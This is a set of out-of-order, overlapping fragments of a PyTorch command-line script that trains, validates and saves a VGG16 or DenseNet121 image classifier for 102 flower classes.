"equality.type(torch.FloatTensor).mean() return valid_loss, valid_acc def train(model, criterion, optimizer, train_loader, valid_loader, device, epochs=1, print_every=50):", "import datasets, models, transforms from collections import OrderedDict import os import argparse #", "hidden = 1024 if learning_rate: learning_rate = learning_rate else: print('No learning_rate specified. Fallback", "images, labels = images.to(device), labels.to(device) outputs = model(images) _, predicted = torch.max(outputs.data, 1)", "default GPU: 1') device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') if device=='cpu': print('CUDA", "specified. Fallback to default dropout: 0.05') dropout = 0.05 for parameter in model.parameters():", "print('Fallback to default GPU: 1') device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') if", "= models.densenet121(pretrained=True) model.name = architecture input_ = 1024 else: print('Invalid input: Please use", "labels.to(device) model.zero_grad() # Forward and backward passes outputs = model.forward(inputs) loss = criterion(outputs,", "} dataloaders = { 'train': torch.utils.data.DataLoader(image_datasets['train'], 64, shuffle=True), 'test': torch.utils.data.DataLoader(image_datasets['test'], 32, shuffle=True), 'valid':", "parser = argparse.ArgumentParser(description='ImageClassifier Params') parser.add_argument('--architecture', type=str, help='Architecture and model from torchvision.models as strings:", "torch.utils.data.DataLoader(image_datasets['train'], 64, shuffle=True), 'test': torch.utils.data.DataLoader(image_datasets['test'], 32, shuffle=True), 'valid': torch.utils.data.DataLoader(image_datasets['valid'], 32, shuffle=True) } return(dataloaders['train'],", "transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]) } image_datasets = { 'train':", "labels) in enumerate(valid_loader): inputs, labels = inputs.to(device), 
labels.to(device) output = model.forward(inputs) valid_loss +=", "epochs = 1 checkpoint = {'state_dict': model.state_dict(), 'classifier': model.classifier, 'class_to_idx': model.class_to_idx, 'epochs': epochs,", "= 0 total = 0 with torch.no_grad(): model.eval() for data in test_loader: images,", "0.456, 0.406], [0.229, 0.224, 0.225])]), 'valid': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224,", "+= (predicted == labels).sum().item() accuracy = round(100 * correct / total, 2) print('Accuracy:", "torch.nn.functional as F import torch.utils.data from torchvision import datasets, models, transforms from collections", "for all three in the same order. Returns all six datasets and loaders,", "datasets and loaders, in the same order. ''' train_dir = data_dir + '/train'", "not available; using CPU') else: print('Using GPU') return(device) def build(device, architecture='vgg16', dropout=0.05, hidden=1024,", "equality = (labels.data == ps.max(dim=1)[1]) valid_acc += equality.type(torch.FloatTensor).mean() return valid_loss, valid_acc def train(model,", "= load() model, criterion, optimizer = build(device, architecture=args.architecture, dropout=args.dropout, hidden=args.hidden, learning_rate=args.learning_rate) model =", "optimizer) def validation(model, valid_loader, criterion, device): ''' Validation function for our model. Returns", "1) total += labels.size(0) correct += (predicted == labels).sum().item() accuracy = round(100 *", "is 0.001.') parser.add_argument('--hidden', type=int, help='Hidden Units for our Neural Network. Default is 1024.')", "order. ''' train_dir = data_dir + '/train' valid_dir = data_dir + '/valid' test_dir", "Units for our Neural Network. Default is 1024.') parser.add_argument('--dropout', type=float, help='Dropout value for", "load(data_dir='./flowers'): ''' Loads data for train, test and validation. 
Also loads dataloaders for", "test_loader, device): ''' Prints validation accuracy of model ''' correct = 0 total", "# Functions def arg_parser(): ''' Takes in command-line arguments and parses them for", "epochs else: print('No epochs specified. Fallback to default epochs: 1') epochs = 1", "valid_loss = round(float(valid_loss/len(valid_loader)), 3) valid_acc = round(float(valid_acc/len(valid_loader)), 3) print('Epoch: {}/{} :: Training Loss:", "= model(images) _, predicted = torch.max(outputs.data, 1) total += labels.size(0) correct += (predicted", "device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') if device=='cpu': print('CUDA not available; using", "epochs = epochs else: epochs = 1 checkpoint = {'state_dict': model.state_dict(), 'classifier': model.classifier,", "help='Use GPU (Y for Yes; N for No). Default is Y.') args =", "in enumerate(valid_loader): inputs, labels = inputs.to(device), labels.to(device) output = model.forward(inputs) valid_loss += criterion(output,", "criterion, device): ''' Validation function for our model. Returns validation loss and accuracy.", "type=float, help='Learning Rate for our Neural Network. Default is 0.001.') parser.add_argument('--hidden', type=int, help='Hidden", "train_loader=train_loader, valid_loader=valid_loader, device=device, criterion=criterion, optimizer=optimizer, epochs=args.epochs) validate(model=model, test_loader=test_loader, device=device) save(model=model, train_data=train_data, epochs=args.epochs, architecture", "loss.backward() optimizer.step() running_loss += loss.item() if steps % print_every == 0: model.eval() with", "value for our Dropout layers. Default is 0.05.') parser.add_argument('--epochs', type=int, help='Epochs for Neural", "parser.add_argument('--epochs', type=int, help='Epochs for Neural Network training. Default is 1.') parser.add_argument('--gpu', type=str, help='Use", "for our model. Returns validation loss and accuracy. 
''' valid_loss = 0 valid_acc", "[0.229, 0.224, 0.225])]), 'valid': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]), 'test':", "GPU: 1') gpu='Y' device = set_device(gpu) train_loader, test_loader, valid_loader, train_data, test_data, valid_data =", "our model. Returns validation loss and accuracy. ''' valid_loss = 0 valid_acc =", "for {} epochs'.format(epochs)) for e in range(epochs): running_loss = 0 for ii, (inputs,", "data_dir + '/train' valid_dir = data_dir + '/valid' test_dir = data_dir + '/test'", "given. Fallback to default architecture: \\'vgg16\\'') model = models.vgg16(pretrained=True) model.name = architecture input_", "to default architecture: \\'vgg16\\'') model = models.vgg16(pretrained=True) model.name = architecture input_ = 25088", "else: print('Incorrect Value for GPU entered.') print('Fallback to default GPU: 1') device =", "= torch.max(outputs.data, 1) total += labels.size(0) correct += (predicted == labels).sum().item() accuracy =", "from torchvision.models as strings: vgg16 and densenet121 supported.') parser.add_argument('--learning_rate', type=float, help='Learning Rate for", "validation accuracy of model ''' correct = 0 total = 0 with torch.no_grad():", "model.forward(inputs) valid_loss += criterion(output, labels).item() ps = torch.exp(output) equality = (labels.data == ps.max(dim=1)[1])", "from torch import nn from torch import optim import torch.nn.functional as F import", "densenet121 supported.') parser.add_argument('--learning_rate', type=float, help='Learning Rate for our Neural Network. Default is 0.001.')", "32, shuffle=True) } return(dataloaders['train'], dataloaders['test'], dataloaders['valid'], image_datasets['train'], image_datasets['test'], image_datasets['valid']) def set_device(gpu): ''' Sets", "else: print('No number of hidden inputs specified. 
Fallback to default inputs: 1024') hidden", "supported.') parser.add_argument('--learning_rate', type=float, help='Learning Rate for our Neural Network. Default is 0.001.') parser.add_argument('--hidden',", "= { 'train': datasets.ImageFolder(train_dir, transform=data_transforms['train']), 'test': datasets.ImageFolder(test_dir, transform=data_transforms['test']), 'valid': datasets.ImageFolder(valid_dir, transform=data_transforms['valid']) } dataloaders", "\\'vgg16\\'') model = models.vgg16(pretrained=True) model.name = architecture input_ = 25088 if hidden: hidden", "''' correct = 0 total = 0 with torch.no_grad(): model.eval() for data in", "input: Please use \\'vgg16\\' or \\'densenet121\\'') else: print('No architecture given. Fallback to default", "functions. ''' parser = argparse.ArgumentParser(description='ImageClassifier Params') parser.add_argument('--architecture', type=str, help='Architecture and model from torchvision.models", "else: epochs = 1 checkpoint = {'state_dict': model.state_dict(), 'classifier': model.classifier, 'class_to_idx': model.class_to_idx, 'epochs':", "print('No input given. Fallback to default GPU: 1') gpu='Y' device = set_device(gpu) train_loader,", "= nn.Sequential(OrderedDict([ ('fc1', nn.Linear(input_, hidden)), ('relu', nn.ReLU()), ('dropout1', nn.Dropout(dropout)), ('fc2', nn.Linear(hidden, 102, bias=True)),", "# Main def main(): args = arg_parser() if args.gpu: gpu=args.gpu else: print('No input", "hidden=1024, learning_rate=0.001): ''' Takens in architecture, gpu, dropout, hidden, learning_rate. Returns a torch", "model.class_to_idx, 'epochs': epochs, 'architecture': architecture} file = 'checkpoint.pth' torch.save(checkpoint, file) print('Model saved to", "learning_rate specified. 
Fallback to default learning_rate: 0.001') learning_rate = 0.001 if dropout: dropout", "training complete!') return(model) def validate(model, test_loader, device): ''' Prints validation accuracy of model", "= data_dir + '/test' data_transforms = {'train': transforms.Compose([transforms.RandomResizedCrop(224), transforms.RandomVerticalFlip(0.5), transforms.RandomRotation(75), transforms.ToTensor(), transforms.Normalize([0.485, 0.456,", "print('CUDA not available; using CPU') else: print('Using GPU') elif gpu=='N': device = 'cpu'", "GPU entered.') print('Fallback to default GPU: 1') device = torch.device('cuda' if torch.cuda.is_available() else", "device): ''' Validation function for our model. Returns validation loss and accuracy. '''", "optimizer.step() running_loss += loss.item() if steps % print_every == 0: model.eval() with torch.no_grad():", "of our Python functions. ''' parser = argparse.ArgumentParser(description='ImageClassifier Params') parser.add_argument('--architecture', type=str, help='Architecture and", "total, 2) print('Accuracy: {}'.format(accuracy)) def save(model, train_data, epochs, architecture): ''' Saves the model", "given. Fallback to default GPU: 1') gpu='Y' device = set_device(gpu) train_loader, test_loader, valid_loader,", "32, shuffle=True), 'valid': torch.utils.data.DataLoader(image_datasets['valid'], 32, shuffle=True) } return(dataloaders['train'], dataloaders['test'], dataloaders['valid'], image_datasets['train'], image_datasets['test'], image_datasets['valid'])", "ii, (inputs, labels) in enumerate(valid_loader): inputs, labels = inputs.to(device), labels.to(device) output = model.forward(inputs)", "= inputs.to(device), labels.to(device) output = model.forward(inputs) valid_loss += criterion(output, labels).item() ps = torch.exp(output)", "0.05.') parser.add_argument('--epochs', type=int, help='Epochs for Neural Network training. 
Default is 1.') parser.add_argument('--gpu', type=str,", "'class_to_idx': model.class_to_idx, 'epochs': epochs, 'architecture': architecture} file = 'checkpoint.pth' torch.save(checkpoint, file) print('Model saved", "def build(device, architecture='vgg16', dropout=0.05, hidden=1024, learning_rate=0.001): ''' Takens in architecture, gpu, dropout, hidden,", "lr=learning_rate) return(model, criterion, optimizer) def validation(model, valid_loader, criterion, device): ''' Validation function for", "0 valid_acc = 0 for ii, (inputs, labels) in enumerate(valid_loader): inputs, labels =", "type=int, help='Epochs for Neural Network training. Default is 1.') parser.add_argument('--gpu', type=str, help='Use GPU", "datasets.ImageFolder(valid_dir, transform=data_transforms['valid']) } dataloaders = { 'train': torch.utils.data.DataLoader(image_datasets['train'], 64, shuffle=True), 'test': torch.utils.data.DataLoader(image_datasets['test'], 32,", "% print_every == 0: model.eval() with torch.no_grad(): valid_loss, valid_acc = validation(model, valid_loader, criterion,", "('fc2', nn.Linear(hidden, 102, bias=True)), ('output', nn.LogSoftmax(dim=1)) ])) model.classifier = classifier model.to(device) criterion =", "help='Epochs for Neural Network training. Default is 1.') parser.add_argument('--gpu', type=str, help='Use GPU (Y", "{} epochs'.format(epochs)) for e in range(epochs): running_loss = 0 for ii, (inputs, labels)", "''' Prints validation accuracy of model ''' correct = 0 total = 0", "the given path. ''' model.class_to_idx = train_data.class_to_idx if epochs: epochs = epochs else:", "Network. Default is 0.001.') parser.add_argument('--hidden', type=int, help='Hidden Units for our Neural Network. 
Default", "build(device, architecture=args.architecture, dropout=args.dropout, hidden=args.hidden, learning_rate=args.learning_rate) model = train(model=model, train_loader=train_loader, valid_loader=valid_loader, device=device, criterion=criterion, optimizer=optimizer,", "torch.save(checkpoint, file) print('Model saved to {}!'.format(file)) # Main def main(): args = arg_parser()", "= nn.NLLLoss() optimizer = optim.Adam(model.classifier.parameters(), lr=learning_rate) return(model, criterion, optimizer) def validation(model, valid_loader, criterion,", "test_loader=test_loader, device=device) save(model=model, train_data=train_data, epochs=args.epochs, architecture = args.architecture) if __name__ == '__main__': main()", "0.225])]), 'valid': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]), 'test': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(),", "= images.to(device), labels.to(device) outputs = model(images) _, predicted = torch.max(outputs.data, 1) total +=", "'train': datasets.ImageFolder(train_dir, transform=data_transforms['train']), 'test': datasets.ImageFolder(test_dir, transform=data_transforms['test']), 'valid': datasets.ImageFolder(valid_dir, transform=data_transforms['valid']) } dataloaders = {", "Also handles most edge-cases. Returns the device variable to be used later. '''", "3) print('Epoch: {}/{} :: Training Loss: {} :: Validation Loss: {} :: Validation", "criterion, optimizer, train_loader, valid_loader, device, epochs=1, print_every=50): ''' Trains our Neural Network model", "= 0 model.train() print('Model training complete!') return(model) def validate(model, test_loader, device): ''' Prints", "architecture input_ = 25088 elif architecture=='densenet121': model = models.densenet121(pretrained=True) model.name = architecture input_", "three in the same order. 
Returns all six datasets and loaders, in the", "Model for {} epochs'.format(epochs)) for e in range(epochs): running_loss = 0 for ii,", "''' Takes in command-line arguments and parses them for usage of our Python", "Trains our Neural Network model ''' steps = 0 if epochs: epochs =", "model.eval() with torch.no_grad(): valid_loss, valid_acc = validation(model, valid_loader, criterion, device) training_loss = round(float(running_loss/print_every),", "= round(float(running_loss/print_every), 3) valid_loss = round(float(valid_loss/len(valid_loader)), 3) valid_acc = round(float(valid_acc/len(valid_loader)), 3) print('Epoch: {}/{}", "using CPU') else: print('Using GPU') return(device) def build(device, architecture='vgg16', dropout=0.05, hidden=1024, learning_rate=0.001): '''", "build(device, architecture='vgg16', dropout=0.05, hidden=1024, learning_rate=0.001): ''' Takens in architecture, gpu, dropout, hidden, learning_rate.", "else: print('Invalid input: Please use \\'vgg16\\' or \\'densenet121\\'') else: print('No architecture given. 
Fallback", "Fallback to default learning_rate: 0.001') learning_rate = 0.001 if dropout: dropout = dropout", "os import argparse # Functions def arg_parser(): ''' Takes in command-line arguments and", "optimizer = optim.Adam(model.classifier.parameters(), lr=learning_rate) return(model, criterion, optimizer) def validation(model, valid_loader, criterion, device): '''", "+= 1 inputs, labels = inputs.to(device), labels.to(device) model.zero_grad() # Forward and backward passes", "= False classifier = nn.Sequential(OrderedDict([ ('fc1', nn.Linear(input_, hidden)), ('relu', nn.ReLU()), ('dropout1', nn.Dropout(dropout)), ('fc2',", "0.456, 0.406], [0.229, 0.224, 0.225])]) } image_datasets = { 'train': datasets.ImageFolder(train_dir, transform=data_transforms['train']), 'test':", "default GPU: 1') gpu='Y' device = set_device(gpu) train_loader, test_loader, valid_loader, train_data, test_data, valid_data", "valid_loader, criterion, device): ''' Validation function for our model. Returns validation loss and", "Main def main(): args = arg_parser() if args.gpu: gpu=args.gpu else: print('No input given.", "steps = 0 if epochs: epochs = epochs else: print('No epochs specified. Fallback", "architecture given. 
Fallback to default architecture: \\'vgg16\\'') model = models.vgg16(pretrained=True) model.name = architecture", "round(float(running_loss/print_every), 3) valid_loss = round(float(valid_loss/len(valid_loader)), 3) valid_acc = round(float(valid_acc/len(valid_loader)), 3) print('Epoch: {}/{} ::", "elif architecture=='densenet121': model = models.densenet121(pretrained=True) model.name = architecture input_ = 1024 else: print('Invalid", "correct += (predicted == labels).sum().item() accuracy = round(100 * correct / total, 2)", "'valid': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]), 'test': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485,", "valid_loader, criterion, device) training_loss = round(float(running_loss/print_every), 3) valid_loss = round(float(valid_loss/len(valid_loader)), 3) valid_acc =", "labels).item() ps = torch.exp(output) equality = (labels.data == ps.max(dim=1)[1]) valid_acc += equality.type(torch.FloatTensor).mean() return", "dataloaders for all three in the same order. Returns all six datasets and", "specified. Fallback to default learning_rate: 0.001') learning_rate = 0.001 if dropout: dropout =", "N for No). Default is Y.') args = parser.parse_args() return(args) def load(data_dir='./flowers'): '''", "print('CUDA not available; using CPU') else: print('Using GPU') return(device) def build(device, architecture='vgg16', dropout=0.05,", "is 0.05.') parser.add_argument('--epochs', type=int, help='Epochs for Neural Network training. Default is 1.') parser.add_argument('--gpu',", "def main(): args = arg_parser() if args.gpu: gpu=args.gpu else: print('No input given. Fallback", "Returns the device variable to be used later. 
''' if gpu=='Y': device =", "import optim import torch.nn.functional as F import torch.utils.data from torchvision import datasets, models,", "labels = data images, labels = images.to(device), labels.to(device) outputs = model(images) _, predicted", "''' parser = argparse.ArgumentParser(description='ImageClassifier Params') parser.add_argument('--architecture', type=str, help='Architecture and model from torchvision.models as", "parser.add_argument('--learning_rate', type=float, help='Learning Rate for our Neural Network. Default is 0.001.') parser.add_argument('--hidden', type=int,", "Fallback to default epochs: 1') epochs = 1 print('Training Model for {} epochs'.format(epochs))", "torch.utils.data.DataLoader(image_datasets['test'], 32, shuffle=True), 'valid': torch.utils.data.DataLoader(image_datasets['valid'], 32, shuffle=True) } return(dataloaders['train'], dataloaders['test'], dataloaders['valid'], image_datasets['train'], image_datasets['test'],", "architecture=args.architecture, dropout=args.dropout, hidden=args.hidden, learning_rate=args.learning_rate) model = train(model=model, train_loader=train_loader, valid_loader=valid_loader, device=device, criterion=criterion, optimizer=optimizer, epochs=args.epochs)", "is Y.') args = parser.parse_args() return(args) def load(data_dir='./flowers'): ''' Loads data for train,", "= 25088 elif architecture=='densenet121': model = models.densenet121(pretrained=True) model.name = architecture input_ = 1024", "and densenet121 supported.') parser.add_argument('--learning_rate', type=float, help='Learning Rate for our Neural Network. Default is", "import os import argparse # Functions def arg_parser(): ''' Takes in command-line arguments", "and parses them for usage of our Python functions. 
''' parser = argparse.ArgumentParser(description='ImageClassifier", "as pd import numpy as np import torch from torch import nn from", "nn.NLLLoss() optimizer = optim.Adam(model.classifier.parameters(), lr=learning_rate) return(model, criterion, optimizer) def validation(model, valid_loader, criterion, device):", "transform=data_transforms['valid']) } dataloaders = { 'train': torch.utils.data.DataLoader(image_datasets['train'], 64, shuffle=True), 'test': torch.utils.data.DataLoader(image_datasets['test'], 32, shuffle=True),", "test_loader: images, labels = data images, labels = images.to(device), labels.to(device) outputs = model(images)", "hidden inputs specified. Fallback to default inputs: 1024') hidden = 1024 if learning_rate:", "epochs, architecture): ''' Saves the model to the given path. ''' model.class_to_idx =", "training_loss = round(float(running_loss/print_every), 3) valid_loss = round(float(valid_loss/len(valid_loader)), 3) valid_acc = round(float(valid_acc/len(valid_loader)), 3) print('Epoch:", "default architecture: \\'vgg16\\'') model = models.vgg16(pretrained=True) model.name = architecture input_ = 25088 if", "as strings: vgg16 and densenet121 supported.') parser.add_argument('--learning_rate', type=float, help='Learning Rate for our Neural", "print('Using GPU') return(device) def build(device, architecture='vgg16', dropout=0.05, hidden=1024, learning_rate=0.001): ''' Takens in architecture,", "# Imports import pandas as pd import numpy as np import torch from", "validate(model=model, test_loader=test_loader, device=device) save(model=model, train_data=train_data, epochs=args.epochs, architecture = args.architecture) if __name__ == '__main__':", "= torch.exp(output) equality = (labels.data == ps.max(dim=1)[1]) valid_acc += equality.type(torch.FloatTensor).mean() return valid_loss, valid_acc", "= {'train': transforms.Compose([transforms.RandomResizedCrop(224), transforms.RandomVerticalFlip(0.5), transforms.RandomRotation(75), transforms.ToTensor(), 
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]), 'valid':", "model.classifier = classifier model.to(device) criterion = nn.NLLLoss() optimizer = optim.Adam(model.classifier.parameters(), lr=learning_rate) return(model, criterion,", "0 with torch.no_grad(): model.eval() for data in test_loader: images, labels = data images,", "Takes in command-line arguments and parses them for usage of our Python functions.", "training_loss, valid_loss, valid_acc)) running_loss = 0 model.train() print('Model training complete!') return(model) def validate(model,", "for our Neural Network. Default is 1024.') parser.add_argument('--dropout', type=float, help='Dropout value for our", "print('No number of hidden inputs specified. Fallback to default inputs: 1024') hidden =", "dropout = dropout else: print('No dropout specified. Fallback to default dropout: 0.05') dropout", "else: print('No architecture given. Fallback to default architecture: \\'vgg16\\'') model = models.vgg16(pretrained=True) model.name", "labels = inputs.to(device), labels.to(device) output = model.forward(inputs) valid_loss += criterion(output, labels).item() ps =", "our Python functions. 
''' parser = argparse.ArgumentParser(description='ImageClassifier Params') parser.add_argument('--architecture', type=str, help='Architecture and model", "default inputs: 1024') hidden = 1024 if learning_rate: learning_rate = learning_rate else: print('No", "'checkpoint.pth' torch.save(checkpoint, file) print('Model saved to {}!'.format(file)) # Main def main(): args =", "data_dir + '/test' data_transforms = {'train': transforms.Compose([transforms.RandomResizedCrop(224), transforms.RandomVerticalFlip(0.5), transforms.RandomRotation(75), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406],", "'cpu') if device=='cpu': print('CUDA not available; using CPU') else: print('Using GPU') return(device) def", "type=str, help='Architecture and model from torchvision.models as strings: vgg16 and densenet121 supported.') parser.add_argument('--learning_rate',", "dropout: dropout = dropout else: print('No dropout specified. Fallback to default dropout: 0.05')", "train(model, criterion, optimizer, train_loader, valid_loader, device, epochs=1, print_every=50): ''' Trains our Neural Network", "if epochs: epochs = epochs else: print('No epochs specified. Fallback to default epochs:", "nn.Linear(input_, hidden)), ('relu', nn.ReLU()), ('dropout1', nn.Dropout(dropout)), ('fc2', nn.Linear(hidden, 102, bias=True)), ('output', nn.LogSoftmax(dim=1)) ]))", "epochs = epochs else: print('No epochs specified. Fallback to default epochs: 1') epochs", "return(model) def validate(model, test_loader, device): ''' Prints validation accuracy of model ''' correct", "if learning_rate: learning_rate = learning_rate else: print('No learning_rate specified. 
Fallback to default learning_rate:", "data_transforms = {'train': transforms.Compose([transforms.RandomResizedCrop(224), transforms.RandomVerticalFlip(0.5), transforms.RandomRotation(75), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]),", "import argparse # Functions def arg_parser(): ''' Takes in command-line arguments and parses", "= round(float(valid_loss/len(valid_loader)), 3) valid_acc = round(float(valid_acc/len(valid_loader)), 3) print('Epoch: {}/{} :: Training Loss: {}", "available; using CPU') else: print('Using GPU') return(device) def build(device, architecture='vgg16', dropout=0.05, hidden=1024, learning_rate=0.001):", "0.001 if dropout: dropout = dropout else: print('No dropout specified. Fallback to default", "''' train_dir = data_dir + '/train' valid_dir = data_dir + '/valid' test_dir =", "return(model, criterion, optimizer) def validation(model, valid_loader, criterion, device): ''' Validation function for our", "GPU: 1') device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') if device=='cpu': print('CUDA not", "parameter. Also handles most edge-cases. Returns the device variable to be used later.", "device=='cpu': print('CUDA not available; using CPU') else: print('Using GPU') return(device) def build(device, architecture='vgg16',", "{'state_dict': model.state_dict(), 'classifier': model.classifier, 'class_to_idx': model.class_to_idx, 'epochs': epochs, 'architecture': architecture} file = 'checkpoint.pth'", "= build(device, architecture=args.architecture, dropout=args.dropout, hidden=args.hidden, learning_rate=args.learning_rate) model = train(model=model, train_loader=train_loader, valid_loader=valid_loader, device=device, criterion=criterion,", "else: print('Using GPU') elif gpu=='N': device = 'cpu' print('Using CPU') else: print('Incorrect Value", "validation(model, valid_loader, criterion, device): ''' Validation function for our model. 
Returns validation loss", "torchvision import datasets, models, transforms from collections import OrderedDict import os import argparse", "''' Sets the device based on the parameter. Also handles most edge-cases. Returns", "device=='cpu': print('CUDA not available; using CPU') else: print('Using GPU') elif gpu=='N': device =", "edge-cases. Returns the device variable to be used later. ''' if gpu=='Y': device", "shuffle=True) } return(dataloaders['train'], dataloaders['test'], dataloaders['valid'], image_datasets['train'], image_datasets['test'], image_datasets['valid']) def set_device(gpu): ''' Sets the", "= criterion(outputs, labels) loss.backward() optimizer.step() running_loss += loss.item() if steps % print_every ==", "print('Using GPU') elif gpu=='N': device = 'cpu' print('Using CPU') else: print('Incorrect Value for", "input_ = 25088 if hidden: hidden = hidden else: print('No number of hidden", "torch import optim import torch.nn.functional as F import torch.utils.data from torchvision import datasets,", "* correct / total, 2) print('Accuracy: {}'.format(accuracy)) def save(model, train_data, epochs, architecture): '''", "dropout else: print('No dropout specified. Fallback to default dropout: 0.05') dropout = 0.05", "inputs, labels = inputs.to(device), labels.to(device) output = model.forward(inputs) valid_loss += criterion(output, labels).item() ps", "learning_rate: learning_rate = learning_rate else: print('No learning_rate specified. Fallback to default learning_rate: 0.001')", "models.vgg16(pretrained=True) model.name = architecture input_ = 25088 if hidden: hidden = hidden else:", "same order. ''' train_dir = data_dir + '/train' valid_dir = data_dir + '/valid'", "print('No dropout specified. 
Fallback to default dropout: 0.05') dropout = 0.05 for parameter", "print('Training Model for {} epochs'.format(epochs)) for e in range(epochs): running_loss = 0 for", "to default dropout: 0.05') dropout = 0.05 for parameter in model.parameters(): parameter.requires_grad =", "Value for GPU entered.') print('Fallback to default GPU: 1') device = torch.device('cuda' if", "= 1 checkpoint = {'state_dict': model.state_dict(), 'classifier': model.classifier, 'class_to_idx': model.class_to_idx, 'epochs': epochs, 'architecture':", "optimizer=optimizer, epochs=args.epochs) validate(model=model, test_loader=test_loader, device=device) save(model=model, train_data=train_data, epochs=args.epochs, architecture = args.architecture) if __name__", "gpu=='N': device = 'cpu' print('Using CPU') else: print('Incorrect Value for GPU entered.') print('Fallback", "= parser.parse_args() return(args) def load(data_dir='./flowers'): ''' Loads data for train, test and validation.", "to default learning_rate: 0.001') learning_rate = 0.001 if dropout: dropout = dropout else:", "valid_loader, train_data, test_data, valid_data = load() model, criterion, optimizer = build(device, architecture=args.architecture, dropout=args.dropout,", "Returns a torch model. ''' if architecture: if architecture=='vgg16': model = models.vgg16(pretrained=True) model.name", "ps = torch.exp(output) equality = (labels.data == ps.max(dim=1)[1]) valid_acc += equality.type(torch.FloatTensor).mean() return valid_loss,", "train(model=model, train_loader=train_loader, valid_loader=valid_loader, device=device, criterion=criterion, optimizer=optimizer, epochs=args.epochs) validate(model=model, test_loader=test_loader, device=device) save(model=model, train_data=train_data, epochs=args.epochs,", "architecture, gpu, dropout, hidden, learning_rate. Returns a torch model. 
''' if architecture: if", "if architecture: if architecture=='vgg16': model = models.vgg16(pretrained=True) model.name = architecture input_ = 25088", "pd import numpy as np import torch from torch import nn from torch", "else: print('Using GPU') return(device) def build(device, architecture='vgg16', dropout=0.05, hidden=1024, learning_rate=0.001): ''' Takens in", "= dropout else: print('No dropout specified. Fallback to default dropout: 0.05') dropout =", "transforms.RandomVerticalFlip(0.5), transforms.RandomRotation(75), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]), 'valid': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485,", "arg_parser() if args.gpu: gpu=args.gpu else: print('No input given. Fallback to default GPU: 1')", "later. ''' if gpu=='Y': device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') if device=='cpu':", "accuracy. ''' valid_loss = 0 valid_acc = 0 for ii, (inputs, labels) in", "= 0 for ii, (inputs, labels) in enumerate(train_loader): steps += 1 inputs, labels", "passes outputs = model.forward(inputs) loss = criterion(outputs, labels) loss.backward() optimizer.step() running_loss += loss.item()", "in command-line arguments and parses them for usage of our Python functions. '''", "all three in the same order. Returns all six datasets and loaders, in", "input_ = 1024 else: print('Invalid input: Please use \\'vgg16\\' or \\'densenet121\\'') else: print('No", "training. Default is 1.') parser.add_argument('--gpu', type=str, help='Use GPU (Y for Yes; N for", "1') device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') if device=='cpu': print('CUDA not available;", "= optim.Adam(model.classifier.parameters(), lr=learning_rate) return(model, criterion, optimizer) def validation(model, valid_loader, criterion, device): ''' Validation", "function for our model. Returns validation loss and accuracy. 
''' valid_loss = 0", "valid_loss = 0 valid_acc = 0 for ii, (inputs, labels) in enumerate(valid_loader): inputs,", "args = arg_parser() if args.gpu: gpu=args.gpu else: print('No input given. Fallback to default", "('fc1', nn.Linear(input_, hidden)), ('relu', nn.ReLU()), ('dropout1', nn.Dropout(dropout)), ('fc2', nn.Linear(hidden, 102, bias=True)), ('output', nn.LogSoftmax(dim=1))", "command-line arguments and parses them for usage of our Python functions. ''' parser", "if steps % print_every == 0: model.eval() with torch.no_grad(): valid_loss, valid_acc = validation(model,", "} return(dataloaders['train'], dataloaders['test'], dataloaders['valid'], image_datasets['train'], image_datasets['test'], image_datasets['valid']) def set_device(gpu): ''' Sets the device", "[0.229, 0.224, 0.225])]), 'test': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]) }", ".format(e+1, epochs, training_loss, valid_loss, valid_acc)) running_loss = 0 model.train() print('Model training complete!') return(model)", "datasets, models, transforms from collections import OrderedDict import os import argparse # Functions", "nn.LogSoftmax(dim=1)) ])) model.classifier = classifier model.to(device) criterion = nn.NLLLoss() optimizer = optim.Adam(model.classifier.parameters(), lr=learning_rate)", "model = train(model=model, train_loader=train_loader, valid_loader=valid_loader, device=device, criterion=criterion, optimizer=optimizer, epochs=args.epochs) validate(model=model, test_loader=test_loader, device=device) save(model=model,", "and model from torchvision.models as strings: vgg16 and densenet121 supported.') parser.add_argument('--learning_rate', type=float, help='Learning", "if gpu=='Y': device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') if device=='cpu': print('CUDA not", "if architecture=='vgg16': model = models.vgg16(pretrained=True) model.name = architecture input_ = 25088 
